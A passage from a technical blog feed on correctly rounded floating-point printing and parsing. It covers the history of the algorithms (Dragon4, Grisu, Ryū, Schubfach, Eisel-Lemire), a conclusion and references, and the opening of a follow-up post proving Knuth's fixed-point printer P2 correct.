In a 2004 retrospective [<a class=footref id='fnref-31' href='#fn-31'>31</a>], Steele and White explained:<blockquote>
<p>
During the 1980s, White investigated the question of whether one
could use limited-precision arithmetic after all rather than bignums.
He had earlier proved by exhaustive testing that just 7 extra bits suffice for correctly printing 36-bit PDP-10 floating-point numbers, if
powers of ten used for prescaling are precomputed using bignums
and rounded just once. But can one derive, without exhaustive testing, the necessary amount of extra precision solely as a function of
the precision and exponent range of a floating-point format? This
problem is still open, and appears to be very hard.</blockquote>
<p>
In 1991, Paxson [<a class=footref id='fnref-28' href='#fn-28'>28</a>] identified the necessary algorithms
to answer that question,
but he put them to use only for deriving difficult test cases,
not for identifying the precision needed to avoid bignums entirely.
My <a href="fp-post">proof post</a> covers that in detail.
<p>
It appears that the first table-based exact conversions without bignums
were developed by Kenton Hanson at Apple,
who documented them on his personal web site in 1997 [<a class=footref id='fnref-15' href='#fn-15'>15</a>]
after retiring. He summarized:<blockquote>
<p>
Once this worst case is determined we have shown how we can
guarantee correct conversions using arithmetic that is slightly
more than double the precision of the target destinations.</blockquote>
<p>
Like Slishman’s work at IBM, Hanson’s work unfortunately went mostly
unnoticed by the broader research community.
<p>
In 2018, Adams [<a class=footref id='fnref-2-3' href='#fn-2'>2</a>] published Ryū, an algorithm for
shortest-width formatting that used 128-bit tables.
After reading that paper
(discussed more in the next section),
Remy Oudompheng
<a href="https://go.dev/change/0184b445c04a0f30e34ce624298547f12630f3aa">rewrote Go’s fixed-width printer</a>
to adopt a table-based single-multiplication strategy.
He originally described it as “a simplified version of [Ryū]
for printing floating-point numbers with a fixed number of decimal
digits,”
but he told me recently
that he meant only that the code made use of the Ryū paper’s observation
that 128-bit precision is generally sufficient for correct conversion.
Because the Ryū paper did not address fixed-width printing
nor prove the correction of the conversions in that context,
Oudompheng devised a new <a href="https://github.com/remyoudompheng/fptest">computational proof</a> based on
<a href="https://en.wikipedia.org/wiki/Stern%E2%80%93Brocot_tree">Stern-Brocot tree traversal</a>.
Oudompheng’s printer
uses Ryū’s fairly complex rounding implementation
and expensive exactness computation based on a
<a href="https://go.googlesource.com/go/+/refs/tags/go1.25.0/src/strconv/ftoaryu.go#546">“divide by five” loop</a>.
I wrote Go’s original floating-point printing routines in 2008
but had not kept up with recent advances.
In 2025, I happened to read Oudompheng’s printer
and realized that the calculation could be significantly simplified
using standard IEEE754 hardware implementation techniques,
including keeping a sticky bit during scaling.
That was the first step down the path to
the general approach of unrounded scaling.
<p>
I am not sure where IEEE754’s sticky bit originated.
The earliest use of it I have found is in Palmer’s 1977 paper
introducing Intel’s standard floating-point [<a class=footref id='fnref-27' href='#fn-27'>27</a>],
but I don’t know whether the sticky bit was new in that hardware design.
<p>
The unrounded scaling approach to fixed-width printing
can be viewed as the same table-based approach
described by Mancino [<a class=footref id='fnref-24-2' href='#fn-24'>24</a>] and Coonen [<a class=footref id='fnref-7-2' href='#fn-7'>7</a>],
but using 128-bit precision
to produce exact results,
as first noted by Hanson [<a class=footref id='fnref-15-2' href='#fn-15'>15</a>]
and then by Hack [<a class=footref id='fnref-14' href='#fn-14'>14</a>] and Adams [<a class=footref id='fnref-2-4' href='#fn-2'>2</a>].
<a class=anchor href="#related.short"><h3 id="related.short">Shortest Printing</h3></a>
<p>
Shortest-width printing has a related but distinct history.
The idea may have begun with Taranto’s 1959 <i>CACM</i> article [<a class=footref id='fnref-33' href='#fn-33'>33</a>],
which considered the problem of converting a fixed-point decimal fraction
into a fixed-point binary fraction of the shortest length to reach a given fixed decimal precision.
From that paper, Knuth derived the problem of converting between any two bases
with shortest output for a fixed precision, publishing it in 1969
as exercise 4.4–3 in the first edition of
<i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i> [<a class=footref id='fnref-18' href='#fn-18'>18</a>].
Knuth included his own solution with a reference to Taranto.
Knuth’s exercise was not quite the <a href="#short">Shortest-Width Printing</a>
problem considered above: first, the exercise is about fixed-point fractions,
so it avoids the complexity of skewed footprints;
and second, the exercise gave no requirement to round correctly,
and the solution did not.
<p>
Steele and White adapted Knuth’s exercise and solution as the basis
for floating-point printing routines in the mid-to-late 1970s.
At the time, they shared a draft paper with Knuth, but the final paper
was not published until PLDI 1990 [<a class=footref id='fnref-30-3' href='#fn-30'>30</a>].
Their fixed-point printing algorithm (FP)³ is Knuth’s solution to exercise 4.4–3,
but updated to round correctly.
In the second edition of <i>Seminumerical Algorithms</i> [<a class=footref id='fnref-19' href='#fn-19'>19</a>],
Knuth changed the exercise to specify rounding,
made Steele and White’s one-line change to the solution,
and cited their unpublished draft.
In the third edition in 1997 [<a class=footref id='fnref-20' href='#fn-20'>20</a>], Knuth was able to cite the published paper.
In my post “<a href="fp-knuth">Pulling a New Proof from Knuth’s Fixed-Point Printer</a>”,
the section titled “<a href="fp-knuth#textbook">A Textbook Solution</a>”
examines Taranto’s, Knuth’s, and Steele and White’s fixed-point algorithms in detail.
<p>
Steele and White’s 1990 paper kicked off a flurry of activity focused mainly
on shortest-width printing.
Their converters were named Dragon2 and Dragon4 (Dragon1 is never described,
and they say they omitted Dragon3 for space),
which set a dragon-themed naming pattern continued by
the ever-more complex printing algorithms that followed.
Gay [<a class=footref id='fnref-11-3' href='#fn-11'>11</a>] and Burger and Dybvig [<a class=footref id='fnref-5' href='#fn-5'>5</a>] found important optimizations
for special cases but left
the core algorithms the same.
In their 2004 retrospective [<a class=footref id='fnref-31-2' href='#fn-31'>31</a>], Steele and White described those
as the only successor papers of note,
but that soon changed.
<p>
Loitsch [<a class=footref id='fnref-23-3' href='#fn-23'>23</a>] introduced the Grisu2 and Grisu3 algorithms at PLDI 2010.
Both use a “do-it-yourself floating-point” or “diy-fp” representation
limited to 64-bit mantissas
to calculate the minimum and maximum decimals
for a given floating point input,
like in our <a href="#short">shortest-width algorithm</a>.
64 bits is not enough to convert exactly,
so Grisu2 rounds the minimum and maximum inward
conservatively.
As a result, it always finds an accurate answer
but may not find the shortest one.
Grisu3 repeats that computation rounding outward.
If its answer also lies within the conservative Grisu2 bounds,
that answer must be shortest.
Otherwise, a fallback algorithm must be used instead.
Grisu3 avoids the fallback
about 99.5% of the time for random inputs.
Due to the importance of formatting speed in
JavaScript and especially JSON,
web browsers and programming languages quickly adopted Grisu3.
<p>
Andrysco, Jhala, and Lerner introduced the Errol algorithms at POPL 2016 [<a class=footref id='fnref-4-2' href='#fn-4'>4</a>].
They extended Loitsch’s approach by replacing
the diy-fps with 106-bit double-double arithmetic [<a class=footref id='fnref-10' href='#fn-10'>10</a>] [<a class=footref id='fnref-18-2' href='#fn-18'>18</a>],
which empirically handles 99.9999999% of all inputs.
They claim to show empirically that “further precision is useless”,
and by careful refinement and analysis
identified that their final version Errol3 only
failed for 45 float64 inputs (!),
which they handled with a special lookup table.
I am not sure what went wrong in their analysis
that kept them from finding that 128-bit precision would have
been completely exact.
<p>
Picking up a different thread,
Abbott <i>et al.</i> [<a class=footref id='fnref-1' href='#fn-1'>1</a>]
published a report in 1999 about IBM’s addition of
IEEE754 floating-point to System/390 and repeated
a description of Slishman’s algorithms [<a class=footref id='fnref-29-2' href='#fn-29'>29</a>].
After reader feedback, Hack [<a class=footref id='fnref-14-2' href='#fn-14'>14</a>] analyzed
the error behavior and in 2004 published the
first proof that 128-bit precision was sufficient
for parsing.
Nadhezin [<a class=footref id='fnref-26' href='#fn-26'>26</a>] adapted the proof to printing
and formally verified it in ACL2,
and Giulietti [<a class=footref id='fnref-12-3' href='#fn-12'>12</a>] used that result to create
the Schubfach shortest-width printing algorithm in 2018.
(In fact Giulietti and Nadhezin showed that
126-bit tables are sufficient,
which is important because Java lacks unsigned 64-bit integers.)
<p>
Unrounded scaling’s shortest-width algorithm
is adapted from Schubfach,
which introduced the critical observation
that with the right choice of <math><mi>p</mi></math>,
at most one valid decimal can end in zero.
Schubfach’s main scaling operation ‘rop’
can be viewed as a special case of unrounded scaling;
Giulietti seems to have even invented the
unrounded form from first principles
(as opposed to adapting IEEE754 implementation techniques as I did).
Schubfach’s rop does not make use of the carry bit optimization,
which is the main reason it runs slower than unrounded scaling.
The Schubfach implementation was adopted
by Java’s OpenJDK <a href="https://bugs.openjdk.org/browse/JDK-8202555">after being reviewed by Steele</a>.
<p>
Apparently independently of Hack, Nadhezin, and Giulietti,
Adams [<a class=footref id='fnref-2-5' href='#fn-2'>2</a>] also discovered that 126-bit precision sufficed
and used that fact to build the Ryū algorithm in 2018.
Ryū does not make use of the carry bit optimization;
its rounding and exactness computations are more complex
than needed; and it finds shortest-width outputs
by repeated division by 10 of the scaled minimum
and maximum decimals, which adds to the expense.
Even so, the improvement over Grisu was clear,
and Adams’s paper was more succinct than Giulietti’s.
Many languages and browsers adopted Ryū.
<p>
In 2020, Jeon [<a class=footref id='fnref-16' href='#fn-16'>16</a>] proposed a new algorithm Grisu-Exact,
applying Ryū’s 128-bit results to Loitsch’s Grisu2 algorithm.
The result does remove the fallback, but it is quite complex.
In 2024, Jeon [<a class=footref id='fnref-17-3' href='#fn-17'>17</a>] proposed Dragonbox,
which applied the Grisu-Exact approach to
optimizing Schubfach.
The result does run faster but once again adds significant
complexity.
The unrounded scaling approach to shortest-width printing
in this post can also be viewed as a 128-bit Grisu2 like Grisu-Exact
or as an optimized Schubfach like Dragonbox,
but it is simpler than either.
The zero-trimming algorithm in this post
is adapted from Dragonbox’s.
<a class=anchor href="#related.parse"><h3 id="related.parse">Parsing</h3></a>
<p>
Parsing has a much shorter history than printing.
As noted earlier,
Mancino [<a class=footref id='fnref-24-3' href='#fn-24'>24</a>] wrote in 1966 that
table-based multiplication algorithms
were “often” used for decimal-to-binary conversions.
Coonen’s 1984 thesis [<a class=footref id='fnref-9-2' href='#fn-9'>9</a>] gave a precise error analysis
for the kinds of inexact algorithms
that were used until Clinger’s 1990 publication of
“How to read floating-point numbers correctly” [<a class=footref id='fnref-6-3' href='#fn-6'>6</a>].
Clinger’s approach is to pair an inexact IEEE754
extended-precision floating-point calculation (using a float80 with a 64-bit mantissa)
to get an answer that is either the correct float64 or adjacent to the correct float64,
and then to check it with a single bignum calculation
and adjust upward or downward as needed.
Gay [<a class=footref id='fnref-11-4' href='#fn-11'>11</a>] quickly improved on this by identifying new special cases
and removing the dependence on extended precision
(replacing float80s with float64s).
<p>
As noted already, Slishman [<a class=footref id='fnref-29-3' href='#fn-29'>29</a>] published in 1990
a table-based parser with carry-bit-based fallback to bignums,
and then Hack [<a class=footref id='fnref-14-3' href='#fn-14'>14</a>] proved in 2004 that
128-bit precision was sufficient to remove the bignum fallback
during parsing.
While that report inspired Giulietti’s development of the Schubfach printer
and Nadhezin’s proof,
it does not seem to been used in any actual floating-point parsers
besides IBM’s.
<p>
In 2020, based on a suggestion and initial code by Eisel,
and apparently completely independent of Slishman and Hack,
Lemire implemented a fast floating-point parser
using a 128-bit table [<a class=footref id='fnref-21' href='#fn-21'>21</a>] [<a class=footref id='fnref-22-3' href='#fn-22'>22</a>] [<a class=footref id='fnref-32' href='#fn-32'>32</a>].
The Eisel-Lemire algorithm is essentially Slishman’s
except with 64 extra bits of precision instead of 16.
Lemire used a fallback just as Slishman did,
unsure that it was unreachable with 128-bit precision.
Mushtak and Lemire [<a class=footref id='fnref-25' href='#fn-25'>25</a>]
published their analog to Hack’s proof a couple years later,
allowing the fallback to be removed.
<p>
The unrounded scaling approach to parsing
is analogous to the approach
pioneered by Slishman, Hack, Eisel, Lemire, and Mushtak,
just framed more generally
and with the carry bit optimization.
<a class=anchor href="#fast_unrounded_scaling"><h3 id="fast_unrounded_scaling">Fast Unrounded Scaling</h3></a>
<p>
Fast unrounded scaling can be viewed as a combination,
generalization, simplification, and optimization of these critical earlier works:
<ul>
<li>
In 1990, Slishman [<a class=footref id='fnref-29-4' href='#fn-29'>29</a>] used the table-based algorithms
for fixed-width printing and parsing, with carry bit fallback check,
but without enough precision to be completely exact.
<li>
In 2004, Hack [<a class=footref id='fnref-14-4' href='#fn-14'>14</a>] improved Slishman’s algorithm
by observing that 128-bit precision allowed removing the fallback.
It is unclear why Hack considered only parsing and
did not generalize to printing.
<li>
In 2010, Loitsch [<a class=footref id='fnref-23-4' href='#fn-23'>23</a>] used a table-based algorithm
for shortest-width printing but, echoing Slishman,
without enough precision to be completely exact.
Loitsch used a new approach to check for exactness
and trigger a fallback.
<li>
In 2018, Giulietti [<a class=footref id='fnref-12-4' href='#fn-12'>12</a>] used a table-based algorithm
for shortest-width printing with enough precision to be exact,
along with the critical observation about finding
formats ending in zero.
The only arguable shortcoming was not using the carry bit
optimization to halve the cost of the scaling multiplication.
<li>
Also in 2018, Adams [<a class=footref id='fnref-2-6' href='#fn-2'>2</a>] used a different table-based algorithm
for shortest-width printing and popularized the fact
that 128 bits was enough precision to be exact.
<li>
In 2020, Eisel and Lemire [<a class=footref id='fnref-22-4' href='#fn-22'>22</a>] rederived
a 128-bit form of Slishman’s algorithm.
Then in 2023, Mushtak and Lemire [<a class=footref id='fnref-25-2' href='#fn-25'>25</a>] proved
that the fallback was unreachable
using methods similar to Hack’s.</ul>
<p>
Even though all the necessary pieces are in those papers waiting to be
connected, it appears that no one did until now.
<p>
As mentioned earlier, I derived the
unrounded scaling <a href="#fixed">fixed-width printer</a>
as an optimized version of Oudompheng’s
Ryū-inspired table-driven algorithm.
While writing up that algorithm with
a new lattice-reduction-based proof of correctness,
I re-read Loitsch’s paper and
realized that for <a href="#short">shortest-width printing</a>,
unrounded scaling
enabled replacing Grisu’s approximate
calculations of the decimal bounds
with exact calculations, eliminating the fallback entirely.
Continuing to read related papers,
I read Giulietti’s Schubfach paper for the first time
and was surprised to find how much of the
approach Giulietti had anticipated,
including apparently reinventing the IEEE754
extra bits.
When I read Lemire’s paper,
I was even more surprised to find
the carry bit fallback check;
the carry bit analysis had played an important role
in my proof of unrounded scaling,
and this was the first similar analysis I had encountered.
(At that point I had not found Slishman’s paper.)
That’s when I realized unrounded scaling also <a href="#parse">applied to parsing</a>.
I knew from my proof that Lemire didn’t need the
fallback.
When I went looking for the code that implemented it
in Lemire’s library,
I found instead a mention of Mushtak and Lemire’s followup proof.
I discovered the other references later.
<p>
My contribution here is primarily a
synthesis of all this prior work into a single unified framework
with a simple explanation and relatively straightforward code.
Thanks to all the authors of this critical earlier work,
whose shoulders I am grateful to be standing on.
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
Floating-point printing and parsing of
reasonably sized decimals
can be done very quickly with very little code.
At long last, the dragons have been vanquished.
<p>
In this post, I have tried to give credit where credit is due
and to represent others’ work fairly and accurately.
I would be extremely grateful to receive additions, corrections,
or suggestions at <a href="mailto:rsc@swtch.com">rsc@swtch.com</a>.
<a class=anchor href="#references"><h2 id="references">References</h2></a>
<ol class=fn>
<li id=fn-1>
P. H. Abbott <i>et al.</i>, “<a href="https://ieeexplore.ieee.org/document/5389154">Architecture and software support in IBM S/390 Parallel Enterprise Servers for IEEE Floating-Point arithmetic</a>”, <i>IBM Journal of Research and Development</i> 43(6), September 1999. <a class=fnref href='#fnref-1'>↩</a>
<li id=fn-2>
Ulf Adams, “<a href="https://dl.acm.org/doi/10.1145/3192366.3192369">Ryū: Fast Float-to-String Conversion</a>”, Proceedings of ACM PLDI 2018. <a class=fnref href='#fnref-2'>↩</a>
<a class=fnref href='#fnref-2-2'>↩</a>
<a class=fnref href='#fnref-2-3'>↩</a>
<a class=fnref href='#fnref-2-4'>↩</a>
<a class=fnref href='#fnref-2-5'>↩</a>
<a class=fnref href='#fnref-2-6'>↩</a>
<li id=fn-3>
Ulf Adams, “<a href="https://dl.acm.org/doi/10.1145/3360595">Ryū Revisited: Printf Floating Point Conversion</a>”, Proceedings of ACM OOPSLA 2019. <a class=fnref href='#fnref-3'>↩</a>
<a class=fnref href='#fnref-3-2'>↩</a>
<li id=fn-4>
Marc Andrysco, Ranjit Jhala, Sorin Lerner, “<a href="https://dl.acm.org/doi/10.1145/2837614.2837654">Printing Floating-Point Numbers: An Always Correct Method</a>”, Proceedings of ACM POPL 2016. <a class=fnref href='#fnref-4'>↩</a>
<a class=fnref href='#fnref-4-2'>↩</a>
<li id=fn-5>
Robert G. Burger and R. Kent Dybvig, “<a href="https://dl.acm.org/doi/10.1145/231379.231397">Printing Floating-Point Numbers Quickly and Accurately</a>”, Procedings of ACM PPLDI 1996. <a class=fnref href='#fnref-5'>↩</a>
<li id=fn-6>
William D. Clinger, “<a href="https://dl.acm.org/doi/pdf/10.1145/93548.93557">How to Read Floating Point Numbers Accurately</a>”, ACM SIGPLAN Notices 25(6), June 1990 (PLDI 1990). <a class=fnref href='#fnref-6'>↩</a>
<a class=fnref href='#fnref-6-2'>↩</a>
<a class=fnref href='#fnref-6-3'>↩</a>
<li id=fn-7>
Jerome T. Coonen, “<a href="https://www.computer.org/csdl/magazine/co/1980/01/01653344/13rRUxbCbof">https://www.computer.org/csdl/magazine/co/1980/01/01653344/13rRUxbCbof</a>”, <i>Computer</i>, 13, January 1980. Reprinted as Chapter 2 of [<a class=footref id='fnref-9-3' href='#fn-9'>9</a>]. <a class=fnref href='#fnref-7'>↩</a>
<a class=fnref href='#fnref-7-2'>↩</a>
<li id=fn-8>
Jerome T. Coonen, “<a href="https://www.computer.org/csdl/magazine/co/1981/03/01667289/13rRUy0HYMA">Underflow and the Denormalized Numbers</a>”, <i>Computer</i> 14, March 1981. <a class=fnref href='#fnref-8'>↩</a>
<li id=fn-9>
Jerome T. Coonen, “<a href="https://ieeemilestones.ethw.org/File:JeromeCoonen_PhD_Thesis.pdf">Contributions to a Proposed Standard for Binary Floating-Point Arithmetic</a>”, University of California, Berkeley Ph.D. thesis, 1984. <a class=fnref href='#fnref-9'>↩</a>
<a class=fnref href='#fnref-9-2'>↩</a>
<a class=fnref href='#fnref-9-3'>↩</a>
<li id=fn-10>
T. J. Dekker, “<a href="https://csclub.uwaterloo.ca/~pbarfuss/dekker1971.pdf">A Floating-Point Technique for Extending the Available Precision</a>”, <i>Numerische Mathematik</i> 18(3), June 1971. <a class=fnref href='#fnref-10'>↩</a>
<li id=fn-11>
David M. Gay, “<a href="https://www.ampl.com/_archive/first-website/REFS/rounding.pdf">Correctly Rounded Binary-Decimal and Decimal-Binary Conversions</a>”, AT&T Bell Laboratories Technical Report, 1990. <a class=fnref href='#fnref-11'>↩</a>
<a class=fnref href='#fnref-11-2'>↩</a>
<a class=fnref href='#fnref-11-3'>↩</a>
<a class=fnref href='#fnref-11-4'>↩</a>
<li id=fn-12>
Raffaello Giulietti, “<a href="https://drive.google.com/file/d/1IEeATSVnEE6TkrHlCYNY2GjaraBjOT4f/edit">The Schubfach way to render doubles</a>”, published online, 2018, revised 2021. <a class=fnref href='#fnref-12'>↩</a>
<a class=fnref href='#fnref-12-2'>↩</a>
<a class=fnref href='#fnref-12-3'>↩</a>
<a class=fnref href='#fnref-12-4'>↩</a>
<li id=fn-13>
Herman H. Goldstein and John von Neumann, <a href="https://www.ias.edu/sites/default/files/library/pdfs/ecp/planningcodingof0103inst.pdf"><i>Planning and Coding Problems for an Electronic Computing Instrument</i></a>, Institute for Advanced Study Report, 1947. <a class=fnref href='#fnref-13'>↩</a>
<li id=fn-14>
Michel Hack, “<a href="https://dominoweb.draco.res.ibm.com/reports/rc23203.pdf">On Intermediate Precision Required for Correctly-Rounding Decimal-to-Binary Floating-Point Conversion</a>”, IBM Technical Paper, May 2004. <a class=fnref href='#fnref-14'>↩</a>
<a class=fnref href='#fnref-14-2'>↩</a>
<a class=fnref href='#fnref-14-3'>↩</a>
<a class=fnref href='#fnref-14-4'>↩</a>
<li id=fn-15>
Kenton Hanson, “<a href="https://web.archive.org/web/20000607192440/http://www.dnai.com/~khanson/ECRBDC.html">Economical Correctly Rounded Binary Decimal Conversions</a>”, published online 1997. <a class=fnref href='#fnref-15'>↩</a>
<a class=fnref href='#fnref-15-2'>↩</a>
<li id=fn-16>
Junekey Jeon, “<a href="https://fmt.dev/papers/Grisu-Exact.pdf">Grisu-Exact: A Fast and Exact Floating-Point Printing Algorithm</a>”, published online, 2020. <a class=fnref href='#fnref-16'>↩</a>
<li id=fn-17>
Junekey Jeon, “<a href="https://raw.githubusercontent.com/jk-jeon/dragonbox/master/other_files/Dragonbox.pdf">Dragonbox: A New Floating-Point Binary-to-Decimal Conversion Algorithm</a>”, published online, 2024. <a class=fnref href='#fnref-17'>↩</a>
<a class=fnref href='#fnref-17-2'>↩</a>
<a class=fnref href='#fnref-17-3'>↩</a>
<li id=fn-18>
Donald E. Knuth, <i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i>, first edition, Addison-Wesley, 1969. <a class=fnref href='#fnref-18'>↩</a>
<a class=fnref href='#fnref-18-2'>↩</a>
<li id=fn-19>
Donald E. Knuth, <i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i>, second edition, Addison-Wesley, 1981. <a class=fnref href='#fnref-19'>↩</a>
<li id=fn-20>
Donald E. Knuth, <i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i>, third edition, Addison-Wesley, 1997. <a class=fnref href='#fnref-20'>↩</a>
<li id=fn-21>
Daniel Lemire, “<a href="https://lemire.me/blog/2020/03/10/fast-float-parsing-in-practice/">Fast float parsing in practice</a>”, published online, March 2020. <a class=fnref href='#fnref-21'>↩</a>
<li id=fn-22>
Daniel Lemire, “<a href="https://arxiv.org/abs/2101.11408">Number Parsing at a Gigabyte per Second</a>”, Software: Practice and Experience 51 (8), 2021. <a class=fnref href='#fnref-22'>↩</a>
<a class=fnref href='#fnref-22-2'>↩</a>
<a class=fnref href='#fnref-22-3'>↩</a>
<a class=fnref href='#fnref-22-4'>↩</a>
<li id=fn-23>
Florian Loitsch, “<a href="https://dl.acm.org/doi/10.1145/1809028.1806623">Printing Floating-Point Numbers Quickly and Accurately with Integers</a>”, ACM SIGPLAN Notices 45(6), June 2010 (PLDI 2010). <a class=fnref href='#fnref-23'>↩</a>
<a class=fnref href='#fnref-23-2'>↩</a>
<a class=fnref href='#fnref-23-3'>↩</a>
<a class=fnref href='#fnref-23-4'>↩</a>
<li id=fn-24>
O. G. Mancino, “<a href="https://dl.acm.org/doi/10.1145/355592.365635">Multiple Precision Floating-Point Conversion from Decimal-to-Binary and Vice Versa</a>”, <i>Communications of the ACM</i> 9(5), May 1966. <a class=fnref href='#fnref-24'>↩</a>
<a class=fnref href='#fnref-24-2'>↩</a>
<a class=fnref href='#fnref-24-3'>↩</a>
<li id=fn-25>
Noble Mushtak and Daniel Lemire, “<a href="https://arxiv.org/pdf/2212.06644">Fast Number Parsing Without Fallback</a>”, <i>Software—Pratice and Experience</i>, 2023. <a class=fnref href='#fnref-25'>↩</a>
<a class=fnref href='#fnref-25-2'>↩</a>
<li id=fn-26>
Dmitry Nadhezin, <a href="https://github.com/nadezhin/verify-todec">nadezhin/verify-todec GitHub repository</a>, published online, 2018. <a class=fnref href='#fnref-26'>↩</a>
<li id=fn-27>
John F. Palmer, “<a href="https://www.arithmazium.org/library/lib/palmer_intel_standard_nov1977.pdf">The Intel Standard for Floating-Point Arithmetic</a>”, Proceedings of COMPSAC 1977. <a class=fnref href='#fnref-27'>↩</a>
<li id=fn-28>
Vern Paxson, “<a href="https://www.icir.org/vern/papers/testbase-report.pdf">A Program for Testing IEEE Decimal-Binary Conversion</a>”, class paper 1991. <a class=fnref href='#fnref-28'>↩</a>
<li id=fn-29>
Gordon Slishman, “<a href="https://mp7.watson.ibm.com/f55d084fadf9ae59852574ab0058f749.html">Fast and Perfectly Rounding Decimal/Hexadecimal Conversions</a>”, IBM Research Report, April 1990. <a class=fnref href='#fnref-29'>↩</a>
<a class=fnref href='#fnref-29-2'>↩</a>
<a class=fnref href='#fnref-29-3'>↩</a>
<a class=fnref href='#fnref-29-4'>↩</a>
<li id=fn-30>
Guy L. Steele and Jon L. White, “<a href="https://dl.acm.org/doi/10.1145/93548.93559">How to Print Floating-Point Numbers Accurately</a>”, ACM SIGPLAN Notices 25(6), June 1990 (PLDI 1990). <a class=fnref href='#fnref-30'>↩</a>
<a class=fnref href='#fnref-30-2'>↩</a>
<a class=fnref href='#fnref-30-3'>↩</a>
<li id=fn-31>
Guy L. Steele and Jon L. White, “<a href="https://dl.acm.org/doi/10.1145/989393.989431">How to Print Floating-Point Numbers Accurately (Retrospective)</a>”, ACM SIGPLAN Notices 39(4), April 2004 (Best of PLDI, 1979-1999). <a class=fnref href='#fnref-31'>↩</a>
<a class=fnref href='#fnref-31-2'>↩</a>
<li id=fn-32>
Nigel Tao, “<a href="https://nigeltao.github.io/blog/2020/eisel-lemire.html">The Eisel-Lemire ParseNumberF64 Algorithm</a>”, published online, October 2020. <a class=fnref href='#fnref-32'>↩</a>
<li id=fn-33>
Donald Taranto, “<a href="https://dl.acm.org/doi/10.1145/368370.368376">Binary Conversion, With Fixed Decimal Precision, Of a Decimal Fraction</a>”, <i>Communications of the ACM</i> 2(7), July 1959. <a class=fnref href='#fnref-33'>↩</a>
<li id=fn-34>
Henry S. Warren, Jr., <i>Hacker’s Delight, 2nd ed.</i>, Addison-Wesley, 2012. <a class=fnref href='#fnref-34'>↩</a>
</ol>
Pulling a New Proof from Knuth’s Fixed-Point Printertag:research.swtch.com,2012:research.swtch.com/fp-knuth2026-01-10T09:00:00-05:002026-01-10T09:02:00-05:00A birthday proof for Don Knuth (Floating Point Formatting, Part 2)<style>
pre code !important { word-spacing: normal; }
code { word-spacing: -0.25em; }
mtd { padding: 0.5ex 0.2em 0.5ex 0.2em; }
mi, mtext, mn { font-family: 'Minion 3'; }
mn.nbf { font-weight: bold; }
math[display="block"] { padding: 0.5em 0; }
mo.compact { lspace: 0; rspace: 0; }
mphantom.vphantom { width: 0; }
</style>
<a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a>
<p>
Donald Knuth wrote his 1989 paper “A Simple Program Whose Proof Isn’t”
as part of a tribute to Edsger Dijkstra on the occasion of Dijkstra’s 60th birthday.
Today’s post is a reply to Knuth’s paper on the occasion of Knuth’s 88th birthday.
<p>
In his paper, Knuth posed the problem
of converting 16-bit fixed-point binary fractions to decimal fractions,
aiming for the shortest decimal that converts back to the original 16-bit binary fraction.
Knuth gives a program named <i>P2</i> that leaves digits in the array <i>d</i> and a digit count in <i>k</i>:<blockquote>
<p>
<i>P2</i>: <br>
<i>j</i> := 0; <i>s</i> := 10 * <i>n</i> + 5; <i>t</i> := 10; <br>
<b>repeat</b> <b>if</b> <i>t</i> > 65536 <b>then</b> <i>s</i> := <i>s</i> + 32768 − (<i>t</i> <b>div</b> 2); <br>
<i>j</i> := <i>j</i> + 1; <i>d</i>[<i>j</i>] = <i>s</i> <b>div</b> 65536; <br>
<i>s</i> := 10 * (<i>s</i> <b>mod</b> 65536); <i>t</i> := 10 * <i>t</i>; <br>
<b>until</b> <i>s</i> ≤ <i>t</i>; <br>
<i>k</i> := <i>j</i>.</blockquote>
<p>
Knuth’s goal was to prove <i>P2</i> correct without exhaustive testing,
and he did, but he didn’t consider the proof ‘simple’.
(Since there are only a small finite number of inputs,
Knuth notes that this problem is a counterexample to Djikstra’s remark that
“testing can reveal the presence of errors but not their absence.”
Exhaustive testing would technically prove the program correct,
but Knuth wants a proof that reveals <i>why</i> it works.)
<p>
At the end of the paper, Knuth wrote, “So. Is there a better program, or a better proof,
or a better way to solve the problem?”
This post presents what is, in my opinion, a better proof of the correctness of <i>P2</i>.
It starts with a simpler program with a trivial direct proof of correctness.
Then it transforms that simpler program into <i>P2</i>, step by step,
proving the correctness of each transformation.
The post then considers a few other ways to solve the problem,
including one from a textbook that Knuth probably had within easy reach.
Finally, it concludes with
some reflections on the role of language in shaping our programs and proofs.
<a class=anchor href="#problem_statement"><h2 id="problem_statement">Problem Statement</h2></a>
<p>
Let’s start with a precise definition of the problem.
The input is a fraction <math><mi>f</mi></math> of the form <math><mrow><mi>n</mi><mn>/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math> for some integer <math><mrow><mi>n</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo stretchy=false>)</mo></mrow></math>.
We want to convert <math><mi>f</mi></math> to the shortest accurate correctly rounded decimal form.
<ul>
<li>
By ‘correctly rounded’ we mean that the decimal is <math><mrow><mi>d</mi><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>+</mo><mn>½</mn></mrow><mo stretchy=false>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>—that is, <math><mi>d</mi></math> is <math><mi>f</mi></math> rounded to <math><mi>p</mi></math> digits—for some <math><mi>p</mi></math>.
<li>
By ‘accurate’ we mean that the decimal rounds back exactly:
<math><mrow><mrow><mo stretchy=false>⌊</mo><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow><mo stretchy=false>⌋</mo></mrow><MO>/</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>=</mo><mi>f</mi></mrow></math>.
<li>
By ‘shortest’ we mean that any shorter correctly rounded decimal <math><mrow><mrow><mo stretchy=false>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>q</mi></msup><mo>+</mo><mn>½</mn></mrow><mo stretchy=false>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>q</mi></msup></mrow></math> for <math><mrow><mi>q</mi><mo><</mo><mi>p</mi></mrow></math> is not accurate.</ul>
<p>
(For this problem, Knuth assumes “round half up” behavior,
